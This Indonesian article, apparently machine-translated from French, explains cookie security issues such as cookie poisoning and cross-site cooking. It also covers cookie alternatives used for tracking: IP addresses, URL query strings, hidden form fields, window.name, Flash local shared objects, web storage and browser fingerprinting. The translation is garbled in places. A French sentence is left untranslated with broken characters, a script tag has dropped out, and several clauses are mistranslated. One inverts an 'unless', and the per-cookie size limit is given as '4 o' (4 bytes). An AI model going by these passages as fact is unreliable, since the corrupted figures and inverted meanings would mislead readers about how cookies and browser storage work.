Segera setelah cookie perlu disimpan dan dikembalikan tanpa perubahan ke server, penyerang dapat mengubah nilai cookie sebelum dikirim kembali ke server. Misalnya, jika cookie berisi nilai total yang harus dibayar pengguna untuk item yang ditempatkan di keranjang belanja toko, mengubah nilai ini akan membuat server berisiko menagih penyerang kurang dari harga awal. Proses memodifikasi nilai cookie disebut keracunan kue dan dapat digunakan setelah pencurian cookie untuk membuat serangan terus-menerus.

Dalam metode penggantian cookie, penyerang mengeksploitasi kesalahan browser untuk mengirimkan cookie yang tidak valid ke server.

Namun, sebagian besar situs web hanya menyimpan ID sesi — nomor unik yang dibuat secara acak yang digunakan untuk mengidentifikasi pengguna sesi — di cookie itu sendiri, sementara semua informasi lainnya disimpan di server. Dalam hal ini, masalah ini sebagian besar diselesaikan.

Setiap situs diharapkan memiliki cookie sendiri, jadi satu situs tidak boleh memodifikasi atau membuat cookie yang terkait dengan situs lain. Cacat keamanan browser web dapat memungkinkan situs jahat melanggar aturan ini. Eksploitasi cacat seperti itu biasanya disebut sebagai memasak lintas situs. Tujuan dari serangan tersebut mungkin adalah pencurian ID sesi.

Pengguna harus menggunakan versi terbaru dari browser web di mana kerentanan ini hampir dihilangkan.

Status konflik antara klien dan server

Penggunaan cookie dapat menimbulkan kontradiksi antara status klien dan status yang disimpan dalam cookie. Jika pengguna memperoleh cookie dan mengklik tombol "Kembali" di browser, status browser umumnya tidak sama seperti sebelum akuisisi ini. Misalnya, jika keranjang toko online dibuat menggunakan cookie, isi keranjang tidak dapat diubah saat pengguna kembali ke riwayat browser: jika pengguna menekan tombol untuk menambahkan artikel ke keranjangnya dan mengklik tombol "Kembali " tombol, artikel tetap di sini. Ini mungkin bukan maksud dari pengguna yang tentunya ingin membatalkan penambahan artikel tersebut. Hal ini dapat menyebabkan tidak dapat diandalkan, kebingungan, dan bug. Jadi pengembang web harus menyadari masalah ini dan menerapkan langkah-langkah untuk menangani situasi seperti ini.

Persisten cookie telah dikritik oleh pakar keamanan privasi karena tidak disetel untuk segera kedaluwarsa, sehingga memungkinkan situs web melacak pengguna dan membangun profil mereka dari waktu ke waktu. Aspek cookie ini juga merupakan bagian dari masalah pembajakan sesi, karena cookie persisten yang dicuri dapat digunakan untuk menyamar sebagai pengguna dalam jangka waktu yang cukup lama.

Baca juga: GAFAM: siapa mereka? Mengapa mereka (terkadang) begitu menakutkan?

Alternatif untuk cookie

Beberapa operasi yang dapat dilakukan menggunakan cookie juga dapat dilakukan dengan menggunakan mekanisme lain yang mem-bypass cookie atau membuat ulang cookie yang dihapus, yang menciptakan masalah privasi dengan cara yang sama (atau terkadang lebih buruk karena tidak terlihat) daripada cookie..

Alamat IP

Pengguna dapat dilacak dengan alamat IP komputer yang memanggil halaman tersebut. Teknik ini telah tersedia sejak diperkenalkannya World Wide Web, saat halaman diunduh, server meminta alamat IP komputer yang menjalankan browser atau proxy, jika tidak ada yang digunakan. Server dapat melacak informasi ini apakah ada cookie yang digunakan atau tidak. Namun, alamat ini biasanya kurang dapat diandalkan dalam mengidentifikasi pengguna daripada cookie karena komputer dan proksi dapat digunakan bersama oleh banyak pengguna, dan komputer yang sama dapat menerima alamat IP yang berbeda pada setiap sesi kerja (seperti c yang sering terjadi untuk koneksi telepon) .

Pelacakan berdasarkan alamat IP dapat diandalkan dalam beberapa situasi, seperti koneksi broadband yang mempertahankan alamat IP yang sama untuk waktu yang lama, selama daya hidup.

Beberapa sistem seperti Tor dirancang untuk menjaga anonimitas Internet dan membuat pelacakan dengan alamat IP menjadi tidak mungkin atau tidak praktis.

URL

Teknik yang lebih tepat didasarkan pada penyematan informasi di URL. Bagian string kueri dari URL adalah salah satu teknik yang biasanya digunakan untuk tujuan ini, tetapi bagian lain juga dapat digunakan. Serverlet Java dan mekanisme sesi PHP menggunakan metode ini jika cookie tidak diaktifkan.

Metode ini melibatkan server web yang menambahkan permintaan string ke tautan halaman web yang membawanya saat dikirim ke browser. Saat pengguna mengikuti tautan, browser mengembalikan string kueri yang dilampirkan ke server.

String kueri yang digunakan untuk tujuan ini dan cookie sangat mirip, keduanya merupakan informasi yang dipilih secara sewenang-wenang oleh server dan dikembalikan oleh browser. Namun, ada beberapa perbedaan: ketika URL yang berisi string kueri digunakan kembali, informasi yang sama dikirim ke server. Misalnya, jika preferensi pengguna dikodekan dalam string kueri URL dan pengguna mengirimkan URL tersebut ke pengguna lain melalui email, pengguna tersebut juga akan dapat menggunakan preferensi tersebut.

Sebaliknya, ketika pengguna mengakses halaman yang sama dua kali, tidak ada jaminan bahwa string kueri yang sama akan digunakan dua kali. Misalnya, jika pengguna membuka halaman dari halaman situs internal untuk pertama kalinya dan membuka halaman yang sama dari halaman eksternal untuk kedua kalinya, string kueri relatif terhadap halaman situs biasanya berbeda, sedangkan cookie sama .

Kerugian lain dari string kueri terkait dengan keamanan: menyimpan data yang mengidentifikasi sesi dalam string kueri memungkinkan atau menyederhanakan serangan fiksasi sesi, serangan referensi pengidentifikasi, dan eksploitasi lainnya. Meneruskan ID sesi sebagai cookie HTTP lebih aman.

Bidang formulir tersembunyi

Salah satu bentuk pelacakan sesi, yang digunakan oleh ASP.NET, adalah menggunakan formulir web dengan bidang tersembunyi. Teknik ini sangat mirip dengan menggunakan string kueri URL untuk membawa informasi dan memiliki kelebihan dan kekurangan yang sama; dan jika formulir diproses dengan metode HTTP GET, bidang sebenarnya menjadi bagian dari URL browser yang akan mengirimkannya saat mengirimkan formulir. Tetapi sebagian besar formulir diproses dengan HTTP POST, yang menyebabkan informasi formulir, termasuk bidang tersembunyi, ditambahkan sebagai input tambahan yang bukan merupakan bagian dari URL atau cookie.

Pendekatan ini memiliki dua keuntungan dari perspektif pelacakan: pertama, melacak informasi yang ditempatkan di kode sumber HTML dan input POST daripada URL akan memungkinkan pengguna rata-rata menghindari pelacakan ini; kedua, informasi sesi tidak disalin saat pengguna menyalin URL (untuk menyimpan halaman ke disk atau mengirimkannya melalui email, misalnya).

jendela.nama

Semua browser web umum dapat menyimpan data dalam jumlah yang cukup besar (2MB hingga 32MB) melalui JavaScript menggunakan properti window.name DOM. Data ini dapat digunakan sebagai pengganti cookie sesi dan juga digunakan di seluruh domain. Teknik ini dapat digabungkan dengan objek JSON untuk menyimpan sekumpulan variabel sesi sisi klien yang kompleks.

Sisi negatifnya adalah bahwa setiap jendela atau tab terpisah pada awalnya akan memiliki nama jendela kosong; saat menjelajah dengan tab (dibuka oleh pengguna) ini berarti tab yang dibuka satu per satu tidak akan memiliki nama jendela. Selain itu window.name dapat digunakan untuk melacak pengunjung di berbagai situs yang dapat menimbulkan masalah privasi.

Dalam beberapa hal ini bisa lebih aman daripada cookie, karena tidak adanya keterlibatan server, sehingga membuatnya kebal terhadap serangan jaringan cookie sniffer. Namun, jika tindakan khusus diambil untuk melindungi data, data tersebut rentan terhadap serangan lebih lanjut, karena data tersedia melalui situs lain yang dibuka di jendela yang sama.

Otentikasi HTTP

Protokol HTTP mencakup protokol autentikasi akses dasar dan intisari autentikasi akses, yang memungkinkan akses ke halaman web hanya jika pengguna telah memberikan nama pengguna dan kata sandi.oke pass. Jika server meminta sertifikat untuk memberikan akses ke halaman web, browser memintanya dari pengguna dan setelah diperoleh, browser menyimpannya dan mengirimkannya ke semua permintaan HTTP berikutnya. Informasi ini dapat digunakan untuk melacak pengguna.

Objek bersama lokal

Jika browser menyertakan plugin Adobe Flash Player, maka objek bersama lokal dapat digunakan untuk tujuan yang sama seperti cookie. Mereka bisa menjadi pilihan yang menarik bagi pengembang web karena:

  • batas ukuran default untuk objek bersama lokal adalah 100 KB;
  • pemeriksaan keamanan terpisah dari pemeriksaan cookie pengguna (jadi objek bersama lokal dapat diizinkan saat cookie tidak diizinkan).

Poin terakhir ini, yang membedakan kebijakan manajemen cookie dari objek bersama lokal Adobe menimbulkan pertanyaan mengenai pengelolaan pengaturan privasinya oleh pengguna: ia harus menyadari bahwa pengelolaan cookie tidak berdampak pada pengelolaan objek bersama lokal, dan sebaliknya.

Kritik lain terhadap sistem ini adalah hanya dapat digunakan melalui plugin Adobe Flash Player yang merupakan hak milik dan bukan standar web.

kegigihan sisi klien

Beberapa browser web mendukung mekanisme persistensi berbasis skrip, yang memungkinkan halaman menyimpan informasi secara lokal untuk digunakan nanti. Internet Explorer, misalnya, mendukung informasi persisten dalam riwayat browser, bookmark, dalam format yang disimpan dalam XML, atau langsung dengan halaman web yang disimpan ke disk. Untuk Microsoft Internet Explorer 5, ada metode data pengguna yang tersedia melalui perilaku DHTML.

W3C memperkenalkan dalam HTML 5 API JavaScript baru untuk penyimpanan data sisi klien yang disebut penyimpanan Web dan bertujuan untuk mengganti cookie secara permanen. Ini mirip dengan cookie tetapi dengan kapasitas yang jauh lebih baik dan tanpa menyimpan informasi di header permintaan HTTP. API memungkinkan dua jenis penyimpanan web: penyimpanan lokal dan penyimpanan sesi, mirip dengan cookie persisten dan cookie sesi (kecuali bahwa cookie sesi kedaluwarsa saat browser ditutup saat penyimpanan sesi kedaluwarsa saat tab ditutup), masing-masing. Penyimpanan web didukung oleh Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 dan Opera 10.50.

Mekanisme yang berbeda biasanya bergantung pada caching browser (di memori daripada menyegarkan) menggunakan program JavaScript di halaman web. 

Misalnya, halaman dapat berisi tag . La premiĂšre fois que la page se charge, le programme exemple.js est aussi chargĂ©. 

Pada titik ini, program tetap berada dalam memori cache dan halaman yang dikunjungi tidak dimuat ulang untuk kedua kalinya. Akibatnya, jika program berisi variabel global (misalnya var id = 3243242;), pengidentifikasi ini tetap valid dan dapat dieksploitasi oleh kode JavaScript lain setelah halaman dimuat kembali, atau setelah halaman yang menghubungkan program dimuat. 

Kerugian utama dari metode ini adalah variabel global JavaScript harus statis, artinya tidak dapat diubah atau dihapus seperti cookie.

sidik jari browser web

Sidik jari browser adalah informasi yang dikumpulkan tentang pengaturan konfigurasi browser untuk tujuan identifikasi. Sidik jari ini dapat digunakan untuk sepenuhnya atau sebagian mengidentifikasi pengguna Internet atau perangkat bahkan ketika cookie dinonaktifkan.

Informasi konfigurasi browser web dasar telah lama dikumpulkan oleh layanan audiens situs web untuk tujuan mengukur lalu lintas web manusia secara akurat dan mendeteksi berbagai bentuk penipuan klik. Dengan bantuan bahasa skrip sisi klien, pengumpulan informasi jauh lebih akurat sekarang mungkin.

Mengubah informasi ini menjadi string bit menghasilkan sidik jari perangkat. Pada tahun 2010, Electronic Frontier Foundation (EFF) mengukur entropi sidik jari browser setidaknya 18,1 bit, dan itu sebelum kemajuan dalam sidik jari kanvas menambahkan 5,7 bit ke entropi itu.

Singkatnya, cookie

Cookie adalah file teks kecil yang disimpan oleh browser web di hard drive pengunjung situs web dan digunakan (antara lain) untuk merekam informasi tentang pengunjung atau perjalanan mereka melalui situs. Dengan demikian, webmaster dapat mengenali kebiasaan pengunjung dan mempersonalisasi penyajian situsnya untuk setiap pengunjung; cookie kemudian memungkinkan untuk mengingat berapa banyak artikel yang akan ditampilkan di halaman beranda atau bahkan untuk mempertahankan kredensial masuk untuk pihak pribadi mana pun: ketika pengunjung kembali ke situs, dia tidak perlu lagi mengetik nama dan kata sandinya untuk dikenali, karena secara otomatis dibaca di cookie.

Cookie memiliki umur terbatas, yang ditetapkan oleh perancang situs. Mereka juga dapat kedaluwarsa pada akhir sesi di situs, yang sesuai dengan penutupan browser. Cookie banyak digunakan untuk membuat hidup lebih mudah bagi pengunjung dan memberi mereka informasi yang lebih relevan. Tetapi teknik khusus memungkinkan untuk mengikuti pengunjung di beberapa situs dan dengan demikian mengumpulkan dan memeriksa silang informasi yang sangat luas tentang kebiasaannya. Metode ini telah memberikan reputasi penggunaan cookie sebagai teknik pengawasan yang melanggar privasi pengunjung, yang sayangnya sesuai dengan kenyataan dalam banyak kasus penggunaan karena alasan non-teknis atau tidak menghormati harapan pengguna. .

Menanggapi ketakutan yang sah ini, HTML 5 memperkenalkan API JavaScript baru untuk penyimpanan data sisi klien yang disebut penyimpanan Web, yang jauh lebih aman dan dengan kapasitas lebih besar, yang bertujuan untuk menggantikan cookie.

Penyimpanan cookie

Dengan beberapa browser, cookie dapat diedit dengan mudah, editor teks sederhana seperti Notepad sudah cukup untuk mengubah nilainya secara manual.

Cookie disimpan secara berbeda tergantung pada browser:

  • Microsoft Internet Explorer menyimpan setiap cookie dalam file yang berbeda;
  • Mozilla Firefox menyimpan semua cookie-nya dalam satu file;
  • Opera menyimpan semua cookie-nya dalam satu file dan mengenkripsinya (tidak mungkin mengubahnya kecuali dalam opsi perangkat lunak);
  • apple Safari menyimpan semua cookie-nya dalam satu file ekstensi .plist. Modifikasi dimungkinkan tetapi tidak terlalu mudah, kecuali jika Anda melalui opsi perangkat lunak.

Browser diperlukan untuk mendukung minimum :

  • 300 cookie secara bersamaan;
  • 4 o per cookie;
  • 20 cookie per host atau domain.
[Total: 0 Berarti: 0]

Ditulis oleh Ulasan Editor

Tim editor ahli menghabiskan waktu mereka untuk meneliti produk, melakukan tes praktik, mewawancarai profesional industri, meninjau ulasan konsumen, dan menulis semua hasil kami sebagai ringkasan yang dapat dipahami dan komprehensif.

Tinggalkan komentar

Alamat email Anda tidak akan dipublikasikan. Bidang yang harus diisi ditandai *

Bagaimana menurut Anda?